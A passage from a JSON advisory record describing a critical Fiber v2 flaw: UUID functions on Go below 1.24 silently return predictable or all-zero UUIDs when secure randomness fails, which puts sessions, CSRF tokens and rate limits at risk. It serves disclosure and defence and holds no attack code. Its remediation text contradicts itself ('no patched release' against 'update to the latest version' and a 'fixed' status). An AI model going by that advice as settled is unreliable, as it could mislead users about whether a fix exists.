critical weakness described in the upstream advisory. On **Go versions prior to 1.24**, the underlying `crypto/rand` implementation **can return an error** if secure randomness cannot be obtained. In such cases, these Fiber v2 UUID functions silently fall back to generating predictable values — the all-zero UUID `00000000-0000-0000-0000-000000000000`.\n\nOn Go **1.24+**, the language guarantees that `crypto/rand` no longer returns an error (it will block or panic instead), so this vulnerability primarily affects **Fiber v2 users running Go 1.23 or earlier**, which Fiber v2 officially supports.\n\nBecause no error is returned by the Fiber v2 UUID functions, application code may unknowingly rely on *predictable, repeated, or low-entropy identifiers* in security-critical pathways. This is especially impactful because many Fiber v2 middleware components (session middleware, CSRF, rate limiting, request-ID generation, etc.) **default to using `utils.UUIDv4()`**.\n\nImpact includes, but is not limited to:\n\n* **Session fixation or hijacking** (predictable session IDs)\n* **CSRF token forgery** or bypass\n* **Authentication replay / token prediction**\n* **Potential denial-of-service (DoS):** if the zero UUID is generated, key-based structures (sessions, rate-limits, caches, CSRF stores) may collapse into a single shared key, causing overwrites, lock contention, or state corruption\n* **Request-ID collisions**, undermining logging and trace integrity\n* **General compromise** of confidentiality, integrity, and authorization logic relying on UUIDs for uniqueness or secrecy\n\nAll Fiber v2 versions containing the internal `utils.UUIDv4()` / `utils.UUID()` implementation are affected when running on **Go <1.24**. **No patched Fiber v2 release currently exists.**\n\n---\n\n## Suggested Mitigations / Workarounds\n\nUpdate to the latest version of Fiber v2.\n\n---\n\n### Likelihood / Environmental Factors\n\nIt’s important to note that **entropy exhaustion on modern Linux systems is extremely rare**, as the kernel’s CSPRNG is resilient and non-blocking. However, **entropy-source failures** — where `crypto/rand` cannot read from its underlying provider — are significantly more likely in certain environments.\n\nThis includes containerized deployments, restricted sandboxes, misconfigured systems lacking read access to `/dev/urandom` or platform-equivalent sources, chrooted or jailed environments, embedded devices, or systems with non-standard or degraded randomness providers. On **Go <1.24**, such failures cause `crypto/rand` to return an error, which the Fiber v2 UUID functions currently treat as a signal to silently generate predictable UUIDs, including the zero UUID. This silent fallback is the root cause of the vulnerability.\n\n---\n\n## References\n\n* Upstream advisory for `gofiber/utils`: **GHSA-m98w-cqp3-qcqr**\n* Source repositories:\n\n  * `github.com/gofiber/fiber`\n  * `github.com/gofiber/utils`\n\n---\n\n## Credits / Reporter\n\nReported by **@sixcolors** (Fiber Maintainer / Security Team)","severity":"critical","status":"fixed","source":"osv","source_url":"https://github.com/gofiber/fiber/security/advisories/GHSA-68rr-p4fp-j59v","labels":["CVE-2025-66630","GO-2026-4471"],"created_at":"2026-04-26 03:01:59.019245+00:00","updated_at":"2026-04-26 03:01:59.019245+00:00"}],"total":19,"_cache":"hit"}